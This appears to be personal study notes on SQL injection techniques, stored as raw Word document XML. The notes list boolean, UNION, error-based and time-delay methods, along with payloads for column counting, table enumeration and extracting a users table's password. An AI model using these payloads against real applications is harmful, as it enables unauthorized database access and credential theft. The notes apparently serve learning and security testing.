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50" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Simple sql injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (NO </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">spaces</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> use `+` instead between string )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:ind w:lef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3">
      <w:pPr>
        <w:spacing w:after="15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cheat sheet: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https://portswigger.net/web-security/sql-injection/cheat-sheet</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:ind w:lef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Methods to try for</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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Boolean</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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UNION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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Conditional statement / error based sql injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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casting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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batch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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time-delay (this is not easily detectable as response has no change)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="144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check with and without `select`</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="216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if batch then select should be used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="216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if condition or concatenation then without select</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="72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spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="72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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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mysql/postgress/microsoft:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="144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table_name from information.tables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="144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column_name from information_schema.columns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="72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Oracle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="144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from all_tables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:jc w:val="left"/>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from all_tab_columns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.v3gmiyd86nf3" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic and Union Injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also identifying the type of database is very important</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="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In the header and cookie might also be using database to query or storage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="72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Submitting the single quote character ' and looking for errors or other anomalies. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="72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Check if injection is possible ‘+AND+’1’=’1’--+</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="144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For </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> # is the way to comment out or – with extra space `--+` + for space encoding in URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:line="24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some injection have query length restriction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shortest query string: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CAST((SELECT password FROM users LIMIT 1) AS int)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>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20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Different places where injection is possible</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="144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In UPDATE statements, within the updated values or the WHERE clause.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="144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In INSERT statements, within the inserted values.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="144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In SELECT statements, within the table or column name.</w:t>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line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check for this </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">`'` and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sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">`'--` </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and check the difference</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="150" w:before="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If Injection is possible then UNION is for retrieval of information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>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sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For a UNION query to work, two key requirements must be met:</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line="240" w:lineRule="auto"/>
        <w:ind w:left="144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The individual queries must return the same number of columns.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:strike w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:strike w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">`' ORDER BY 1--` and increase the # on by one</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">`' UNION SELECT NULL</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26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">+` and then increase the n</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">umber</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> of null one by one</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="28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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">n url it would be like ' UNION + Select + NULL, NULL </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">–+</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The data types in each column must be compatible between the individual queries.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="26"/>
